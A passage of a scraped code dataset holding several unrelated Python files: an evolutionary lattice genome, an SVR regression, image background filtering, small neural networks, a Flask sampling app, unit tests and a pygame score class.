new_map\n\n\n\n# ======= Crossover helpers =======================================================\n\n @staticmethod\n def crossover_bases(child1, child2, parent2):\n if np.random.rand() < 0.5:\n child1.basis0_len = parent2.basis0_len\n child1.basis0_angle = parent2.basis0_angle\n else:\n child2.basis0_len = parent2.basis0_len\n child2.basis0_angle = parent2.basis0_angle\n if np.random.rand() < 0.5:\n child1.basis1_len = parent2.basis1_len\n child1.basis1_angle = parent2.basis1_angle\n else:\n child2.basis1_len = parent2.basis1_len\n child2.basis1_angle = parent2.basis1_angle\n\n @staticmethod\n def crossover_angle_table_and_map(child1, child2, parent2):\n \"\"\"Crossover angle table and angle tile map. if both parents tile_map/table are same shape, then children will have same shape.\"\"\"\n for child in (child1, child2):\n child.angle_tile_map = Individual.crossover_arrays(child.angle_tile_map, parent2.angle_tile_map)\n child.angle_tile_shape = child.angle_tile_map.shape\n child.angle_table = Individual.crossover_arrays_1d(child.angle_table, parent2.angle_table,\n size=child.num_angles if child.num_angles is not None else np.prod(child.angle_tile_shape))\n\n @staticmethod\n def crossover_hole_tile(child1, child2, parent2):\n \"\"\"Crossover hole tile. if both parents hole tile are same shape, then children will have same shape.\"\"\"\n for child in (child1, child2):\n child.hole_tile = Individual.crossover_arrays(child.hole_tile, parent2.hole_tile)\n child.hole_tile_shape = child.hole_tile.shape\n child._fix_holes()\n\n @staticmethod\n def crossover_evo_params(child1, child2, parent2):\n for param, rnd in zip(parent2._evolved_params, np.random.random(len(parent2._evolved_params))):\n if rnd > 0.5:\n child1.evolved_params_values[param] = deepcopy(parent2.evolved_params_values[param])\n else:\n child2.evolved_params_values[param] = deepcopy(parent2.evolved_params_values[param])\n\n @staticmethod\n def crossover_arrays(arr1, arr2):\n \"\"\"Crossover two arrays, can be different shapes but same dim, new shape is random between the two\"\"\"\n assert arr1.ndim == arr2.ndim, \"Arrays must have same number of dimensions\"\n if arr1.ndim == 1:\n return Individual.crossover_arrays_1d(arr1, arr2)\n assert arr1.ndim == 2, \"Arrays must be 1d or 2d\"\n shape = (Individual.randint_between(arr1.shape[0], arr2.shape[0]), Individual.randint_between(arr1.shape[1], arr2.shape[1]))\n rand = np.random.rand(*shape)\n arr = np.zeros_like(rand).astype(arr1.dtype)\n for i in range(shape[0]):\n for j in range(shape[1]):\n if Individual.valid_index(arr1, i, j) and Individual.valid_index(arr2, i, j):\n arr[i, j] = arr1[i, j] if rand[i, j] < 0.5 else arr2[i, j]\n elif Individual.valid_index(arr1, i, j):\n arr[i, j] = arr1[i, j]\n elif Individual.valid_index(arr2, i, j):\n arr[i, j] = arr2[i, j]\n else: # sample random value from arr1 or arr2\n arr[i, j] = np.random.choice(np.concatenate((arr1.flatten(), arr2.flatten())))\n\n return arr\n\n @staticmethod\n def valid_index(arr, i, j):\n return i >= 0 and j >= 0 and i < arr.shape[0] and j < arr.shape[1]\n\n @staticmethod\n def crossover_arrays_1d(arr1, arr2, size=None):\n \"\"\"Crossover two 1d arrays, new shape is random between the two if sizee is None.\n If size is not None, the new array will be of that size, if extra values is needed,\n it will be filled with random samples from arr1 and arr2\"\"\"\n if size is None:\n size = Individual.randint_between(len(arr1), len(arr2))\n arr = np.zeros(size).astype(arr1.dtype)\n longest = arr1 if len(arr1) > len(arr2) else arr2\n shortest = arr1 if len(arr1) < len(arr2) else arr2\n arr[:len(shortest)] = np.where(np.random.rand(len(shortest)) > 0.5, shortest, longest[:len(shortest)])\n arr[len(shortest):len(longest)] = longest[len(shortest):len(longest)]\n if len(arr) > len(longest):\n diff = len(arr) - len(longest)\n arr[len(longest):] = np.random.choice(np.hstack((longest, shortest)), diff)\n return arr\n\n @staticmethod\n def randint_between(a, b, inclusive=True):\n if a == b:\n return a\n if a > b:\n a, b = b, a\n if inclusive:\n return np.random.randint(a, b + 1)\n return np.random.randint(a + 1, b)\n# ===================================================================================\n\n def mutate(self, strength=1):\n child = self.copy(parent_ids=[self.id])\n mutations = [Individual.mutate_bases, Individual.mutate_angle_table, Individual.mutate_angle_tile_map]\n if self.max_holes != self.min_holes:\n mutations.append(Individual.mutate_hole_tile)\n\n weights = [1] * len(mutations)\n if len(self.evolved_params_values) > 0:\n mutations += [Individual.mutate_evo_param]\n # increase chance of selecting param-mutation by the num of evo params so they are picked evenly\n weights += [len(self.evolved_params_values)]\n mutation = np.random.choice(mutations, p=np.array(weights) / np.sum(weights))\n mutation(child, strength)\n child.reset()\n return [child]\n\n def crossover(self, other):\n child1 = self.copy(parent_ids=[self.id, other.id])\n child2 = self.copy(parent_ids=[self.id, other.id])\n Individual.crossover_bases(child1, child2, other)\n Individual.crossover_angle_table_and_map(child1, child2, other)\n Individual.crossover_hole_tile(child1, child2, other)\n Individual.crossover_evo_params(child1, child2, other)\n child1.reset()\n child2.reset()\n return [child1, child2]\n\n def from_string(string, keep_pheno=False, **overide_kwargs):\n array = np.array\n kwargs = eval(string)\n kwargs.update(overide_kwargs)\n\n return Individual(**kwargs)\n\n def __repr__(self):\n ignored_attrs = ['pos', 'angle']\n return repr({k: v for k, v in vars(self).items() if k not in ignored_attrs})\n\n def copy(self, **override_kwargs):\n ignored_attrs = ['pos', 'angle', 'id', 'gen']\n rename_attrs = {'_lattice_size': 'lattice_size', '_max_holes': 'max_holes', '_min_holes': 'min_holes'}\n params = {k: v for k, v in vars(self).items() if k not in ignored_attrs}\n params.update(override_kwargs)\n for old_name, new_name in rename_attrs.items():\n if old_name in params:\n params[new_name] = params.pop(old_name)\n\n return Individual(**params)\n\n @staticmethod\n def get_default_shared_params(outdir=\"\", gen=None, select_param=None):\n default_params = {\n \"model\": \"TileLatticeSpinIce\",\n \"encoder\": \"AngleSine\",\n \"radians\": True,\n }\n if select_param is not None:\n return default_params[select_param]\n if gen is not None:\n outdir = os.path.join(outdir, f\"gen{gen}\")\n default_params[\"basepath\"] = outdir\n\n return default_params\n\n @staticmethod\n def get_default_run_params(pop, sweep_list=None, *, condition=None):\n sweep_list = sweep_list or [[0, 0, {}]]\n\n id2indv = {individual.id: individual for individual in [p for p in pop if condition is None or condition(p)]}\n\n run_params = []\n for id, indv in id2indv.items():\n for i, j, rp in sweep_list:\n run_params.append(dict(rp, indv_id=id, basis0=indv.basis0, basis1=indv.basis1, angle_tile=indv.angle_tile, hole_tile=indv.hole_tile,\n size=indv.lattice_shape, sub_run_name=f\"_{i}_{j}\"))\n return run_params\n\n\ndef main(outdir=r\"results\\tileTest\", inner=\"flips\", outer=\"default\", minimize_fitness=True, calculate_fit_only=False, **kwargs):\n known_fits = {\n\n } # genotype-specific fitnesses\n\n inner = known_fits.get(inner, fitness_functions.known_fits.get(inner, inner))\n outer = known_fits.get(outer, fitness_functions.known_fits.get(outer, outer))\n\n if calculate_fit_only:\n return ea.only_run_fitness_func(outdir, Individual, inner, outer, minimize_fitness=minimize_fitness, **kwargs)\n else:\n return ea.main(outdir, Individual, inner, outer, minimize_fitness=minimize_fitness, **kwargs)\n\n\ndef random_range(min, max, shape=None):\n if shape is None:\n return min + (max - min) * np.random.rand()\n else:\n return min + (max - min) * np.random.rand(*shape)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n import argparse\n from flatspin.cmdline import StoreKeyValue, eval_params\n from base_individual import make_parser\n\n parser = make_parser()\n args = parser.parse_args()\n\n evolved_params = eval_params(args.evolved_param)\n if args.evo_rotate:\n evolved_params[\"initial_rotation\"] = [0, 2 * np.pi]\n\n outpath = os.path.join(os.path.curdir, args.output)\n logpath = os.path.join(outpath, args.log)\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n logging.basicConfig(filename=logpath, level=logging.INFO)\n main(\n outdir=args.output,\n **eval_params(args.parameter),\n evolved_params=evolved_params,\n individual_params=eval_params(args.individual_param),\n outer_eval_params=eval_params(args.outer_eval_param),\n sweep_params=args.sweep_param,\n dependent_params=args.dependent_param,\n repeat=args.repeat,\n repeat_spec=args.repeat_spec,\n group_by=args.group_by,\n calculate_fit_only=args.calculate_fit_only,\n )\n","repo_name":"SocratesNFR/flatspin-evo","sub_path":"lattice_geno.py","file_name":"lattice_geno.py","file_ext":"py","file_size_in_byte":23421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70958484355","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVR\n\ndataset = pd.read_csv(\"Position_Salaries.csv\")\nx = dataset.iloc[:, 1:-1].values\ny = dataset.iloc[:, -1].values\n\n# Feature Scaling\n\n# Reshaping y into a 2D array\n# reshape first argument is the shape wanted\n# We give the length and the number of columns\ny = y.reshape(len(y), 1)\n\nsc_x = StandardScaler()\nsc_y = StandardScaler()\nx = sc_x.fit_transform(x)\ny = sc_y.fit_transform(y)\n\n# Training a model with SVR\nregressor = SVR(kernel=\"rbf\")\nregressor.fit(x, y)\n\n# Predicting a new result\nprediction = sc_y.inverse_transform(regressor.predict(sc_x.transform([[6.5]])).reshape(-1, 1))\n\n# Visualizing the SVR results\nplt.scatter(sc_x.inverse_transform(x), sc_y.inverse_transform(y), color=\"red\")\nplt.plot(sc_x.inverse_transform(x), sc_y.inverse_transform(regressor.predict(x).reshape(-1, 1)),\n color=\"blue\")\nplt.title(\"Support Vector Regression Model\")\nplt.xlabel(\"Position Level\")\nplt.ylabel(\"Salary\")\nplt.show()\n\n# Visualizing the SVR results with a higher resolution and smoother curve\nx_grid = np.arange(min(sc_x.inverse_transform(x)), max(sc_x.inverse_transform(x)), 0.1)\nx_grid = x_grid.reshape((len(x_grid), 1))\nplt.scatter(sc_x.inverse_transform(x), sc_y.inverse_transform(y), color=\"red\")\nplt.plot(x_grid, sc_y.inverse_transform(regressor.predict(sc_x.transform(x_grid)).reshape(-1, 1)),\n color=\"blue\")\nplt.title(\"Support Vector Regression Model (Smoother Curve)\")\nplt.xlabel(\"Position Level\")\nplt.ylabel(\"Salary\")\nplt.show()\n","repo_name":"Charanvir/Support-Vector-Regression","sub_path":"support_vector_regression.py","file_name":"support_vector_regression.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3669586677","text":"data = []\ncount = 0\nwith open('reviews.txt','r') as f:\n for line in f:\n data.append(line)\n count += 1\n if count % 1000 == 0:\n print(len(data))\n\nprint('file read finish, total for', len(data))\n\n# for average len of message\nsum_len = 0\nfor d in data:\n sum_len = sum_len + len(d)\nprint('The average lenth of message is:', sum_len/len(data))\n\nnew = []\nfor d in data:\n if len(d) < 100:\n new.append(d)\nprint('Total are', len(new), 'words less than 100 words!!')","repo_name":"waterboyop/review-analytics","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8577470152","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom cv2 import cv2\nfrom matplotlib import pyplot as plt\nimport random\n\n\n\nclass MedianFiltering():\n \"\"\"\n Class representing the median filtering approach for background modeling.\n \"\"\"\n def __init__(self, alpha, T):\n \"\"\"\n Parameters\n ----------\n alpha : float\n The adaption rate for the median filter\n\n T : int\n The thresholding value for the binary image\n \"\"\"\n self.alpha = alpha\n self.T = T\n\n def create_binary_images(self, frames, visualize):\n \"\"\"Given all the frames, set all frames' likelihood image\"\"\"\n # approx median,\n # converge slowly to background\n # m = np.ones((height, width))\n # m *= 128\n # or assume first frame is background\n m = frames[0].rgb_image\n tot_frames = len(frames)\n\n for t in range(tot_frames):\n # What the code does:\n # for i in range(width):\n # for j in range(height):\n # if frame_list.frames[t][j][i] > m[j][i]:\n # m[j][i] += alpha\n # else:\n # m[j][i] -= alpha\n #\n # # segment binary\n # if abs(frame_list.frames[t][j][i] - m[j][i]) > T:\n # binary[t][j][i] = 1\n # Vectorized\n pix_largthan_med = np.greater(frames[t].rgb_image, m)\n m = m + self.alpha * pix_largthan_med + self.alpha * (pix_largthan_med - 1) # +alpha where it's larger, -alpha where smaller\n bin_im_rgb = 1*np.greater(np.absolute(frames[t].rgb_image - m), self.T).astype('uint8')\n frames[t].binary_image = np.zeros((bin_im_rgb.shape[0],bin_im_rgb.shape[1]))\n for i in range(2):\n frames[t].binary_image = np.logical_or(frames[t].binary_image, bin_im_rgb[:,:,i])\n frames[t].binary_image = frames[t].binary_image.astype('uint8')\n\n # To visualize every 5th frame:\n if visualize:\n self.visualize_filtering(frames)\n \n\n def visualize_filtering(self, frames):\n tot_frames = len(frames)\n plt.figure()\n i = 0\n display_image = True\n while display_image:\n plt.imshow(frames[i].binary_image, cmap='gray')\n plt.pause(0.0001)\n plt.clf()\n i += 5\n if i >= tot_frames:\n display_image = False\n\n\n def suppress_shadows(self, frames, visualize):\n # Hypothesis is that a shadowed pixel value’s value and saturation \n # will decrease while the hue remains relatively constant.\n \n # H = channel 0 (Hue)\n # S = channel 1 (Saturation)\n # V = channel 2 (Lightness)\n\n alpha = 0.3\n beta = 0.9\n Ts = 0.3\n Th = 0.5\n\n tot_frames = len(frames)\n pixels_states = frames[0].binary_image\n previous_hhvvss = cv2.cvtColor(frames[0].rgb_image, cv2.COLOR_BGR2HSV)\n for t in range(tot_frames):\n print(\"frame no: \", t)\n \n hsv_frame = cv2.cvtColor(frames[t].rgb_image, cv2.COLOR_BGR2HSV)\n\n temp1 = np.logical_xor(frames[t].binary_image, pixels_states)\n temp2 = frames[t].binary_image # foreground == 1\n\n moved_pixels = np.logical_and(temp1, temp2)\n\n \n Xfl = hsv_frame[:, :, 2]\n Xfs = hsv_frame[:, :, 1]\n Xfh = hsv_frame[:, :, 0]\n\n Xbl = previous_hhvvss[:, :, 2]\n Xbs = previous_hhvvss[:, :, 1]\n Xbh = previous_hhvvss[:, :, 0]\n\n Xbl = np.where(Xbl <= 0, -1, Xbl)\n div = np.divide(Xfl, Xbl)\n diff = np.array(Xfs) - np.array(Xbs)\n abs_diff = np.absolute(np.array(Xfh) - np.array(Xbh))\n\n cond1 = np.logical_and(alpha <= div , beta >= div)\n cond2 = diff <= Ts\n cond3 = abs_diff <= Th\n\n potential_shadowed_pixels = np.logical_and(cond1, cond2, cond3)\n potential_shadowed_pixels = np.logical_not(potential_shadowed_pixels)\n potential_shadowed_pixels = np.logical_and(potential_shadowed_pixels, moved_pixels)\n\n frames[t].binary_image = np.where(potential_shadowed_pixels == 1, 0.25, frames[t].binary_image)\n\n pixels_states = frames[t].binary_image\n previous_hhvvss = hsv_frame\n\n if visualize:\n self.visualize_filtering(frames)\n\n # width = p.shape[1]\n # height = p.shape[0]\n # for i in range(width):\n # for j in range(height):\n # if (frames[t].binary_image[j][i] == 1 # loop over all foreground pixels\n # and frames[t].binary_image[j][i] != pixels_states[j][i]): # which have changed\n\n # Xfl = hsv_frame[j][i][2]\n\n # Xbl = self.calculate_previous_hsv_values(previous_hhvvss, j, i, 2)\n # if(Xbl == 0):\n # break\n\n # Xfs = hsv_frame[j][i][1]\n # Xbs = self.calculate_previous_hsv_values(previous_hhvvss, j, i, 1)\n\n # Xfh = hsv_frame[j][i][0]\n # Xbh = self.calculate_previous_hsv_values(previous_hhvvss, j, i, 0)\n\n # if( (alpha <= (Xfl/Xbl) <= beta) \n # and ((Xfs - Xbs) <= Ts) \n # and (abs(Xfh - Xbh) <= Th) ):\n # #print(\"pixel \", j, i, \"unaltered\")\n # frames[t].binary_image[j][i] = 1\n # else:\n # #print(\"pixel \", j, i, \"altered\")\n # frames[t].binary_image[j][i] = 0.5\n\n","repo_name":"TSBB15-2021-group-4/object-tracking","sub_path":"own/background_model/MedianFiltering.py","file_name":"MedianFiltering.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26785230116","text":"\"\"\"\n kuzu.py\n COMP9444, CSE, UNSW\n\"\"\"\n\nfrom __future__ import print_function\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass NetLin(nn.Module):\n # linear function followed by softmax\n def __init__(self):\n super(NetLin, self).__init__()\n # INSERT CODE HERE\n self.linear = nn.Linear(784, 10)\n self.softmax = nn.LogSoftmax()\n\n def forward(self, x):\n x = x.view(x.shape[0], -1)\n x = self.linear(x)\n x = self.softmax(x)\n return x\n\nclass NetFull(nn.Module):\n # two fully connected tanh layers followed by log softmax\n def __init__(self):\n super(NetFull, self).__init__()\n self.hidden = nn.Linear(784, 64)\n self.output = nn.Linear(64, 10)\n self.softmax = nn.LogSoftmax()\n\n def forward(self, x):\n x = x.view(x.shape[0], -1)\n x = F.tanh(self.hidden(x))\n x = self.output(x)\n x = self.softmax(x)\n return x\n\nclass NetConv(nn.Module):\n # two convolutional layers and one fully connected layer,\n # all using relu, followed by softmax\n def __init__(self):\n super(NetConv, self).__init__()\n self.conv1 = nn.Conv2d(1, 20, 5)\n self.conv2 = nn.Conv2d(20, 80, 5)\n self.linear = nn.Linear(1280, 64)\n self.output = nn.Linear(64, 10)\n self.softmax = nn.LogSoftmax()\n\n def forward(self, x):\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(x.shape[0], -1)\n x = F.tanh(self.linear(x))\n x = self.output(x)\n x = self.softmax(x)\n return x\n\n'''\nif __name__ == '__main__':\n net = NetConv()\n print('#Parameters number:', sum(param.numel() for param in net.parameters()))\n'''","repo_name":"Starlight972/UNSW-Projects","sub_path":"COMP9444 Neural Networks and Deep Learning/Assignment 1/hw1/kuzu.py","file_name":"kuzu.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34007933914","text":"def seq(a,prev,i,s):\n\tif(prev[i]==-1):\n\t\ts.append(a[i])\n\t\treturn s\n\telse:\n\t\ts.append(a[i])\n\t\tseq(a,prev,prev[i],s)\n\ndef lis(a,n):\n\tdp=[1]*n\n\tprev=[-1]*n\n\tfor i in range(1,n):\n\t\tfor j in range(i):\n\t\t\tif(a[i]>a[j] and dp[i] pd.DataFrame:\n return df","repo_name":"webzerg/tableshift","sub_path":"tableshift/datasets/physionet.py","file_name":"physionet.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32250088724","text":"from flask import Flask\nimport io\nfrom flask import send_file\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras import Model\nfrom PIL import Image\n\n\napp = Flask(__name__)\n\n\n# Note 1: We need this loss function here to reconstruct the model.\ndef loss (y_true, y_pred):\n \"\"\" This loss computes the squared difference between the predicted and\n true value; averaged across the batch.\n \"\"\"\n result = (y_true - y_pred) ** 2\n loss_batch = tf.math.reduce_sum(result, axis=-1)\n mean_loss = tf.math.reduce_mean(loss_batch)\n return mean_loss\n\n\nmodel_path = \"logs/20200311-203307/ckpt/weights.03-0.02.hdf5\"\nnet = tf.keras.models.load_model( model_path\n , custom_objects = {\"loss\": loss} )\n\n\n# Note 2: Pick out the z-dim from the network, and let's just\n# display the network for good measure.\nz_dim = net.get_layer(\"z\").output.shape[-1]\n\nnet.summary()\n\n\n# Note 3: \n# In TF2/Keras it's a bit annoying to sample from the model. If we\n# want to run a $z$ vector through, we need to build the output from\n# a new input. So we just pick out all layers after the $z$ layer, and\n# then apply them to our input.\nin_z = tf.keras.Input(shape=(10))\nlayers = net.layers[6:] # Layer 6 is the one after the \"z\" layer.\noutput = in_z\nfor l in layers:\n output = l(output)\n\nsample_model = Model( in_z, outputs=output )\nsample_model.summary()\n\n\n@app.route(\"/\")\ndef index ():\n return \"Visit /sample/312.\"\n\n\n@app.route(\"/sample/\")\ndef sample (seed=2):\n\n # Note 4: We can just pick a random z vector now; and push it through the\n # network, then get out an image, and render it.\n np.random.seed(seed)\n z_vect = np.random.uniform(-1, 1, (1, z_dim))\n\n\n img = sample_model.predict(z_vect)\n img = Image.fromarray(img.squeeze() * 255)\n img = img.resize((200, 200), Image.ANTIALIAS)\n\n sprite = Image.new(mode=\"L\", size=(200, 200))\n sprite.paste(img)\n\n arr = io.BytesIO()\n # Annoyingly, there is a bug in flask that means we need to write to\n # a tmp file. If flask was well-behaved, we could serve the image directly\n # from the `BytesIO` object.\n sprite.save(\"/tmp/img.jpg\", format=\"jpeg\")\n\n resp = send_file(\"/tmp/img.jpg\", mimetype='image/jpeg')\n\n return resp\n","repo_name":"BraneShop/autoencoder-fashion-mnist","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5659581297","text":"'''\r\nCreated on Oct 24, 2019\r\n\r\n@author: Tonirel\r\n'''\r\nfrom Adaugare import create_tz,get_suma,get_tip,get_zi,valid_tz,add_tz, create_state\r\nfrom Cautari import sum_gr8_than,b4_day_gr8_than,tz_anumit_tip\r\nfrom Service import sv_el_tz_tip,sv_sum_tip,sv_sold,sv_tz_tip_ord,sv_del_tz_zi,sv_del_tz_per,sv_del_tz_tip,sv_el_tz_small_and_type,sv_undo\r\ndef run_all_tests():\r\n test_create_tz()\r\n test_valid_tz()\r\n test_sum_gr8_than()\r\n test_b4_day_gr8_than()\r\n test_tz_anumit_tip()\r\n test_sv_el_tz_tip()\r\n test_add_tz()\r\n test_sv_sum_tip()\r\n test_sv_sold()\r\n test_sv_tz_tip_ord()\r\n test_sv_del_tz_zi()\r\n test_sv_del_tz_per()\r\n test_sv_del_tz_tip()\r\n test_sv_el_tz_small_and_type()\r\n test_undo()\r\ndef test_create_tz():\r\n tz=create_tz(1,100.50,'intrare')\r\n assert(get_zi(tz)==1)\r\n assert(get_suma(tz)==100.50)\r\n assert(get_tip(tz)=='intrare')\r\n \r\ndef test_add_tz():\r\n s=create_state()\r\n s2=create_state()\r\n zi=1\r\n suma=100\r\n tip='intrare'\r\n tz=create_tz(zi,suma,tip)\r\n add_tz(s, tz)\r\n add_tz(s2,tz)\r\n assert(s==s2)\r\n \r\ndef test_valid_tz():\r\n tz=create_tz(1,100.50,'intrare')\r\n valid_tz(tz)\r\n \r\n tz1=create_tz(-3,100.50,'intrare')\r\n try:\r\n valid_tz(tz1)\r\n assert(False)\r\n except Exception as ex:\r\n assert(str(ex)==\"zi incorecta!\")\r\n \r\n tz2=create_tz(3,-34.6,'intrare')\r\n try:\r\n valid_tz(tz2)\r\n assert(False)\r\n except Exception as ex:\r\n assert(str(ex)==\"suma incorecta!\")\r\n \r\n tz3=create_tz(3,100.50,'random')\r\n try:\r\n valid_tz(tz3)\r\n assert(False)\r\n except Exception as ex:\r\n assert(str(ex)==\"tip incorect!\")\r\ndef test_sum_gr8_than():\r\n tz1=create_tz(1, 10, 'intrare')\r\n tz2=create_tz(2, 50, 'iesire')\r\n assert(sum_gr8_than(30,tz1)==False)\r\n assert(sum_gr8_than(30,tz2)==True)\r\ndef test_b4_day_gr8_than():\r\n tz1=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(30,15,tz1)==True)\r\n tz2=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(30,5,tz2)==False)\r\n tz3=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(100,15,tz3)==False)\r\n tz4=create_tz(10,50,'intrare')\r\n assert(b4_day_gr8_than(100,5,tz4)==False)\r\ndef test_tz_anumit_tip():\r\n tz1=create_tz(10,50,'intrare')\r\n assert(tz_anumit_tip(tz1,'intrare')==True)\r\n tz2=create_tz(10,50,'iesire')\r\n assert(tz_anumit_tip(tz2,'iesire')==True)\r\n tz3=create_tz(10,50,'intrare')\r\n assert(tz_anumit_tip(tz3,'iesire')==False)\r\n tz4=create_tz(10,50,'iesire')\r\n assert(tz_anumit_tip(tz4,'intrare')==False)\r\n \r\ndef test_sv_el_tz_tip():\r\n s=create_state()\r\n s2=create_state()\r\n tz1=create_tz(10,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(15,150,'iesire')\r\n add_tz(s,tz2)\r\n tz3=create_tz(50,200,'intrare')\r\n add_tz(s,tz3)\r\n \r\n add_tz(s2,tz1)\r\n add_tz(s2,tz3)\r\n T='iesire'\r\n assert (sv_el_tz_tip(T,s)==s2)\r\n \r\n s2=create_state()\r\n add_tz(s2,tz2)\r\n T='intrare'\r\n assert(sv_el_tz_tip(T, s)==s2)\r\ndef test_sv_el_tz_small_and_type():\r\n s=create_state()\r\n s2=create_state()\r\n tz1=create_tz(10,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(15,150,'iesire')\r\n add_tz(s,tz2)\r\n tz3=create_tz(50,200,'intrare')\r\n add_tz(s,tz3)\r\n T='intrare'\r\n S=120\r\n add_tz(s2,tz2)\r\n add_tz(s2,tz3)\r\n assert(sv_el_tz_small_and_type(S,T,s)==s2)\r\ndef test_sv_sum_tip():\r\n s=create_state()\r\n T='intrare'\r\n assert(sv_sum_tip(T,s)=='Lista este goala!')\r\n tz1=create_tz(10,100,'intrare')\r\n add_tz(s,tz1)\r\n T='iesire'\r\n assert(sv_sum_tip(T,s)==0)\r\n tz2=create_tz(15,150,'iesire')\r\n add_tz(s,tz2)\r\n tz3=create_tz(50,200,'intrare')\r\n add_tz(s,tz3)\r\n T='intrare'\r\n assert(sv_sum_tip(T,s)==300)\r\n T='iesire'\r\n assert(sv_sum_tip(T,s)==150)\r\ndef test_sv_sold():\r\n s=create_state()\r\n Z=5\r\n assert(sv_sold(Z,s)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(3,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(4,20,'iesire')\r\n add_tz(s,tz4)\r\n assert(sv_sold(Z,s)==230)\r\n Z=2\r\n assert(sv_sold(Z,s)==50)\r\ndef test_sv_tz_tip_ord():\r\n s=create_state()\r\n T='intrare'\r\n assert(sv_tz_tip_ord(T,s)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(3,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(4,20,'iesire')\r\n add_tz(s,tz4)\r\n s2=create_state()\r\n add_tz(s2,tz1)\r\n add_tz(s2,tz2)\r\n assert(sv_tz_tip_ord(T,s)==s2)\r\n \r\ndef test_sv_del_tz_zi():\r\n s=create_state()\r\n Z=2\r\n assert(sv_del_tz_zi(s,Z)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(1,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(2,20,'iesire')\r\n add_tz(s,tz4)\r\n s2=create_state()\r\n add_tz(s2,tz1)\r\n add_tz(s2,tz2)\r\n assert(sv_del_tz_zi(s,Z)==s2)\r\ndef test_sv_del_tz_per():\r\n s=create_state()\r\n Z1=2\r\n Z2=5\r\n assert(sv_del_tz_per(s,Z1,Z2)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(1,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(3,20,'iesire')\r\n add_tz(s,tz4)\r\n Z1=1\r\n Z2=2\r\n s2=create_state()\r\n add_tz(s2,tz4)\r\n assert(sv_del_tz_per(s,Z1,Z2)==s2)\r\n Z1=2\r\n Z2=1\r\n assert(sv_del_tz_per(s,Z1,Z2)==s2)\r\ndef test_sv_del_tz_tip():\r\n s=create_state()\r\n T='intrare'\r\n assert(sv_del_tz_tip(s,T)=='Lista este goala!')\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n tz2=create_tz(1,200,'intrare')\r\n add_tz(s,tz2)\r\n tz3=create_tz(2,50,'iesire')\r\n add_tz(s,tz3)\r\n tz4=create_tz(3,20,'iesire')\r\n add_tz(s,tz4)\r\n s2=create_state()\r\n add_tz(s2,tz3)\r\n add_tz(s2,tz4)\r\n assert(sv_del_tz_tip(s,T)==s2)\r\n s3=create_state()\r\n T='iesire'\r\n assert(sv_del_tz_tip(s,T)==s3)\r\ndef test_undo():\r\n s=create_state()\r\n us=create_state()\r\n tz1=create_tz(1,100,'intrare')\r\n add_tz(s,tz1)\r\n us.append(tz1)\r\n tz2=create_tz(2,200,'iesire')\r\n add_tz(s,tz2)\r\n us2=create_state()\r\n us2.append(tz1)\r\n us2.append(tz1)\r\n us.append(us2.copy())\r\n s2=create_state()\r\n add_tz(s2,tz1)\r\n del s[:]\r\n s+=sv_undo(s,us).copy()\r\n assert(us==s2)","repo_name":"Tonirel/Test_Repository","sub_path":"TemaLab4_6Istvan/Cod/Tests.py","file_name":"Tests.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18915957914","text":"import pygame.ftfont\nfrom pygame.sprite import Group\nfrom plane import Plane\nclass Score():\n def __init__(self,ai_settings,screen,stats):\n self.screen =screen\n self.ai_settings =ai_settings\n self.screen_rect =screen.get_rect()\n self.stats = stats\n self.text_color=(30,30,30)\n #字体设置\n self.font = pygame.font.SysFont(None,28)\n self.init_score()\n self.init_level()\n self.init_left_life()\n def init_left_life(self):\n self.planes = Group()\n for life in range(self.stats.hero_left):\n plane = 